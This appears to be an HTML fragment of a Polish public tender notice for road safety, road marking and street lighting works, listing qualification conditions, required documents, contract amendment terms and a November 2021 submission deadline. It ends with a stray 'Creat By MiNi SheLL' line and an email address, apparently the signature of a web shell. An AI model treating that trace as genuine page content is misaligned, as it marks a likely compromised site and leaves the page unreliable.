class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia na zadanie 1 oraz zadanie 2 mogą ubiegać się wykonawcy którzy nie podlegają wykluczeniu (na podstawie art. 108 ust 1 pkt. 1-6 oraz art. 109 ust. 1 pkt. 4 Ustawy) oraz spełniają warunki udziału w postępowaniu.<br/><br/>Wykonawca spełni warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej: <br/><br/> Warunek zostanie spełniony:<br/> <br/> a) jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował co najmniej: <br/><br/>Zadanie 1 – dwa zadania w zakresie wykonania elementów bezpieczeństwa ruchu drogowego oraz oznakowania pionowego lub oznakowania poziomego na drogach lub dwa zadania z zakresu wykonania prac (robót) związanych z budową, przebudową, modernizacją, utrzymaniem, konserwacją sieci (przyłączy) oświetlenia ulicznego; <br/><br/>Zadanie 2 – dwa zadania w zakresie wykonania elementów bezpieczeństwa ruchu drogowego oraz oznakowania pionowego lub oznakowania poziomego na drogach lub dwa zadania z zakresu wykonania prac (robót) związanych z budową, przebudową, modernizacją, utrzymaniem, konserwacją sieci (przyłączy) oświetlenia ulicznego;<br/><br/> b) wykonawca wykaże, że dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonaniu zamówienia (osoby skierowane przez wykonawcę do realizacji zamówienia) legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji jakie zostaną im powierzone:<br/> <br/> Zadanie 1, Zadanie 2 - Kierownik budowy – 1 osoba musi posiadać uprawnienia budowlane wymagane przepisami prawa do pełnienia samodzielnej funkcji technicznej w zakresie kierowania robotami budowlanymi, specjalność drogowa lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów (podstawa prawna Ustawa z dnia 7 lipca 1994 r. Prawo budowlane). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis albo informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust.1 pkt.4 Ustawy.<br/><br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w kraju, w którym nie wydaje się dokumentów o których mowa w pkt.10.1a to zamiast dokumentów o których mowa w pkt. 10.1a składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury. <br/><br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesięcy przed złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, <br/>o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio <br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą złożone przed <br/>organem sadowym lub administracyjnym, notariuszem, organem samorządu <br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania tej wykonawcy. Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio. (Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed złożeniem).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu (zadanie 1, zadanie 2):<br/><br/>a. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca <br/>wykonania i podmiotów, na rzecz których roboty te zostały wykonane z załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami <br/>prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty.<br/><br/>b. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę <br/>jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich <br/>kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do <br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/>czynności oraz informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty na zadanie 1 oraz zadanie 2 (Formularz oferty na zadanie 1 stanowi załącznik nr 1a , formularz oferty na zadanie 2 stanowi załącznik nr 1b do SWZ) Wykonawca dołącza aktualne na dzień składania ofert:<br/><br/> a. oświadczenie o spełnieniu warunków udziału w postępowaniu - opisanych w pkt. 8.2 <br/> niniejszej specyfikacji) – zał. nr 2a oraz zał. nr 2b<br/> b. oświadczenie dotyczące przesłanek wykluczenia z postępowania – opisanych w pkt. <br/> 8.1 niniejszej specyfikacji ) - zał. nr 3a oraz zał. nr 3b<br/><br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o zamówienie każdy z wykonawców oddzielnie składa w/w oświadczenia.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają zgodnie z art.117 ust. 4 Ustawy, oświadczenie (załącznik nr 5a oraz 5b do SWZ), z którego wynika które roboty wykonają poszczególni Wykonawcy.<br/><br/>Wykonawca, który w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, przedstawiając w szczególności zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – propozycja zobowiązania - załącznik nr 4a, 4b do SWZ.<br/><br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach wymienionych w pkt. 9.1a i 9.1b. oraz przekazuje oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia (9.1b) tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (9.1a), w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/><br/>Kosztorys ofertowy - stanowiący załącznik nr 8a oraz 8b do SWZ oraz potwierdzenie wniesienia wadium na zasadach opisanych w ust. 12 SWZ (jeżeli wadium jest wymagane przez Zamawiającego).<br/><br/>Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (w tym spółki cywilne). <br/><br/>Pełnomocnictwo do występowania w imieniu wykonawcy w przypadku, gdy ofertę i inne dokumenty nie podpisuje osoba uprawniona do reprezentowania wykonawcy (lub wykonawca w przypadku osób fizycznych). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (zadanie 1, zadanie 2). W przypadku wspólnego ubiegania się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym konsorcja, spółki cywilne) żaden z Wykonawców nie może podlegać wykluczeniu (podstawy wykluczenia - pkt. 8.1 SWZ.).<br/><br/>Natomiast spełnianie warunków opisanych w pkt. 8.2 Wykonawcy wykazują wspólnie, łącznie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie z którego wynika które roboty wykonają poszczególni wykonawcy (9.2 SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art.455 ust.1 pkt. 1 Ustawy zamawiający przewiduje następujące <br/> możliwości zmiany umowy:<br/><br/>Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania <br/> zamówienia w przypadku wystąpienia niezależnych od Wykonawcy okoliczności :<br/> a. w przypadku wystąpienia robót nie objętych przedmiotem zamówienia (robót <br/> dodatkowych), które są niezbędne do wykonania, a których realizacja powoduje <br/> konieczność przedłużenia terminu umowy,<br/> b. w przypadku wystąpienia konieczności wykonania robót zamiennych,<br/> c. ujawnienia niezinwentaryzowanych lub o odmiennym przebiegu niezgodnym z inwentaryzacją podziemnych sieci, instalacji lub urządzeń obcych i konieczności <br/> wykonania robót związanych z ich zabezpieczeniem lub usunięciem kolizji, <br/> d. w przypadku, gdy po rozpoczęciu robót okaże się, że sieci podziemne, instalacje, <br/> urządzenia obce są w złym stanie technicznym i zachodzi konieczność ich remontu <br/> przez podmioty odpowiedzialne za te sieci, urządzenia, co spowoduje przerwę<br/> w realizacji przedmiotu umowy, <br/> e. w przypadku wystąpienia niekorzystnych warunków atmosferycznych, nie <br/> pozwalających na prowadzenie prac oraz uniemożliwiających zapewnienie <br/> odpowiedniej jakości wykonywanych robót, tj.: ciągłe opady atmosferyczne (trwające <br/> powyżej 5 dni) lub wstrzymanie robót po opadach w związku z namoknięciem <br/> terenu, zalaniem placu budowy i uszkodzeniami przez intensywne opady.<br/><br/>W przypadku zaistnienia w/w okoliczności ust.21.3 Zamawiający może przedłużyć termin <br/> zakończenia wykonania zamówienia na pisemny, szczegółowo uzasadniony wniosek <br/> Wykonawcy zaopiniowany przez osobę nadzorująca ze strony Zamawiającego. Okres <br/> przedłużenia terminu nie może być dłuższy niż czas trwania tych okoliczności.<br/><br/>21.5. Zmiana osoby na stanowisku kierownika budowy pod warunkiem, że wskazana osoba <br/> spełniać będzie wymagania określone w specyfikacji warunków zamówienia. <br/> <br/>Zmiana wynagrodzenia w związku z rozliczeniem wykonanych robót kosztorysem powykonawczym, oraz w przypadku zmiany umowy na podstawie art. 455 ust.1, pkt 1,2,3,4 oraz ust. 2.<br/><br/>Zmiana wynagrodzenia będąca konsekwencją wykonania robót zamiennych oraz robót zaniechanych.<br/><br/>W przypadku, gdy oferta Wykonawcy nie zawierała wskazania części, którą na etapie realizacji zamówienia zamierza on powierzyć Podwykonawcy, Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, tj. powierzenia części zamówienia do realizacji przez Podwykonawców.<br/><br/>Zamawiający dopuszcza rezygnację z Podwykonawcy lub zmianę Podwykonawcy. <br/> W przypadku zmiany lub rezygnacji z Podwykonawcy, na którego zasoby <br/> Wykonawca powoływał się w celu wykazania spełniania warunków udziału <br/> w postępowaniu Wykonawca jest zobowiązany do wykazania Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż Podwykonawca na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. <br/><br/>Zamawiający wskazuje pozostałe przypadki przewidzianych w umowie zmian w informacjach dodatkowych (SEKCJA IX – POZOSTAŁE INFORMACJE). Pełny opis zmian zawarty jest także w ust. 21 SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-15 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty (zaszyfrowane) należy przesłać droga elektroniczną za pośrednictwem https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-15 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozostałe przypadki dopuszczalnych zmian umowy:<br/><br/>Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.<br/><br/>Zmiana osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego.<br/><br/>Zmiany niezbędne do prawidłowej realizacji zamówienia związane z:<br/> - koniecznością zapewnienia bezpieczeństwa lub zapobieżenie awarii,<br/> - koniecznością spowodowana zmianą obowiązujących przepisów prawa powodującą, że <br/> realizacja przedmiotu umowy w niezmienionej postaci stanie się niecelowa, <br/> - okoliczności powodujące, że przedmiot umowy nie może zostać zrealizowany zgodnie z zasadami sztuki inżynierskiej, <br/> - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy <br/> okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi <br/> odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, <br/> zgodnie ze Specyfikacją Warunków Zamówienia - Zamawiający dopuszcza <br/> możliwość zmiany umowy, w szczególności terminu realizacji zamówienia; <br/> - w przypadku wystąpienia nieprzewidywanych w dniu podpisywania umowy kolizji z planowanymi lub równolegle prowadzonymi przez inne pod¬mioty inwestycjami w zakresie nie¬zbędnym do uniknięcia lub usunięcia tych kolizji, w przypadku gdy wykonywanie robót nie będzie możliwe ze względu na obowiązek skoordynowania robót z Wykonawcą innych robót wykonywanych na terenie budowy.<br/> (przedłużenie terminu realizacji będzie dopuszczalne jedynie o okres występowania <br/> kolizji uniemożliwiający prowadzenie prac), <br/><br/> - gdy pomimo dochowania należytej staranności Wykonawcy pozyskiwanie stosownych <br/> uzgodnień gestorów sieci, innych podmiotów lub osób, których opinia lub zgoda będzie <br/> wymagana przepisami prawa, przedłuży się w czasie ponad termin zwyczajowo przyjęty <br/> dla danej czynności (prze¬dłużenie terminu realizacji będzie dopuszczalne jedynie o okres <br/> trwania czynności wykraczający poza zwyczajowo przyjęty), <br/><br/>Zmiana terminu wykonania Umowy w przypadku:<br/> – zmian obowiązujących przepisów prawa wpływających na termin i sposób wykonania <br/>przedmiotu Umowy, w tym w szczególności wynikających z ustawy z dnia 2 marca 2020 (Dz. U. z 2020 r., poz. 1639 z późn. zm.) o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych;<br/> - przedłużenia przez władze państwowe stanu epidemii lub dokonania zmiany tego stanu<br/> na inny stan wyjątkowy, ograniczający normalny sposób funkcjonowania państwa. <br/>a. Wniosek o zmianę Umowy powinien zawierać zakres proponowanej zmiany, opis okoliczności faktycznych uprawniających do dokonania zmiany, informacje i dowody potwierdzające, że zostały spełnione okoliczności uzasadniające dokonanie zmiany umowy. <br/>b.	Strona wnioskująca o zmianę terminu wykonania umowy zobowiązana jest do wykazania, że ze względu na zaistniałe okoliczności – uprawniające do dokonania zmiany – dochowanie pierwotnego terminu jest niemożliwe.

Creat By MiNi SheLL
Email: jattceo@gmail.com